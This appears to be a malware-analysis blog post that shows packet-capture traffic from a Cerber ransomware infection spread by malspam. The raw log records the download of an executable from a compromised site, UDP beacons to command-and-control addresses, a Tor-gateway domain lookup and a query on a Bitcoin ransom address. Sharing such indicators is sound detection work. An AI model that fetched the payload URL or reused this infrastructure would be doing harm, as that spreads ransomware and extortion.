Monthly Archives: December 2016

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

 

Example of files that were encrypted and protected:

 

The domain name ftoxmpdipwobp4qy.joa688.top was NX and not required for the purchase process.

2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1
E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.monitorspeakers.net
Connection: Keep-Alive

2016-12-16 01:29:06.602141 IP 192.168.1.102.50077 > 216.58.218.234.443: Flags [.], seq 1936354787:1936354788, ack 530483529, win 254, length 1
E..)w.@……..f.:……sjm….IP………….
2016-12-16 01:29:09.071199 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [.], ack 255316, win 735, length 0
E..(..@……..fH……P.n.2….P….?……..
2016-12-16 01:29:16.674408 IP 192.168.1.102.59297 > 15.49.2.0.6892: UDP, length 10
E..&$…..C….f.1……….hi00889070……..
2016-12-16 01:29:16.675018 IP 192.168.1.102.59297 > 15.49.2.1.6892: UDP, length 10
E..&.D….KC…f.1……….hi00889070……..
2016-12-16 01:29:16.675047 IP 192.168.1.102.59297 > 15.49.2.2.6892: UDP, length 10
E..&xz………f.1……….hi00889070……..
2016-12-16 01:29:16.675052 IP 192.168.1.102.59297 > 15.49.2.3.6892: UDP, length 10
E..&A…..&….f.1……….hi00889070……..
2016-12-16 01:29:16.675175 IP 192.168.1.102.59297 > 15.49.2.4.6892: UDP, length 10
E..&
…..]….f.1……….hi00889070……..
2016-12-16 01:29:16.675185 IP 192.168.1.102.59297 > 15.49.2.5.6892: UDP, length 10
E..&3<….5G…f.1……….hi00889070……..
2016-12-16 01:29:16.675235 IP 192.168.1.102.59297 > 15.49.2.6.6892: UDP, length 10
E..&V……p…f.1……….hi00889070……..
2016-12-16 01:29:16.675256 IP 192.168.1.102.59297 > 15.49.2.7.6892: UDP, length 10

2016-12-16 01:29:30.059041 IP 192.168.1.102.59298 > 15.49.2.7.6892: UDP, length 24
E..4p……m…f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059046 IP 192.168.1.102.59298 > 15.49.2.8.6892: UDP, length 24
E..4s……….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059145 IP 192.168.1.102.59298 > 15.49.2.9.6892: UDP, length 24
E..4J……….f.1.     ….. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059156 IP 192.168.1.102.59298 > 15.49.2.10.6892: UDP, length 24
E..4/l….9….f.1.
….. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059223 IP 192.168.1.102.59298 > 15.49.2.11.6892: UDP, length 24
E..4……Q….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059292 IP 192.168.1.102.59298 > 15.49.2.12.6892: UDP, length 24
E..4^…..
c…f.1……. 2.2107cd482fd40088950110cf

2016-12-16 01:32:13.634751 IP 192.168.1.102.50425 > 75.75.75.75.53: 35627+ A? ftoxmpdipwobp4qy.joa688.top. (45)
E..I………..fKKKK…5.5~R.+………..ftoxmpdipwobp4qy.joa688.top…..

2016-12-16 01:32:14.439186 IP 192.168.1.102.58408 > 75.75.75.75.53: 63853+ A? btc.blockr.io. (31)
E..;………..fKKKK.(.5.’…m………..btc.blockr.io…..
2016-12-16 01:32:14.511003 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [S], seq 3315200002, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4c.@…9-…f…….P………. .w……………
2016-12-16 01:32:14.643338 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [.], ack 604253513, win 256, length 0
E..(c.@…98…f…….P….$.-IP………….
2016-12-16 01:32:14.647140 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 0:254, ack 1, win 256, length 254: HTTP: GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
E..&c.@…89…f…….P….$.-IP…>…GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io/api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757
Connection: Keep-Alive

2016-12-16 01:32:15.111089 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 254:534, ack 25007, win 256, length 280: HTTP: GET /api/v1/tx/info/60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea?_=1481869858429

Share Button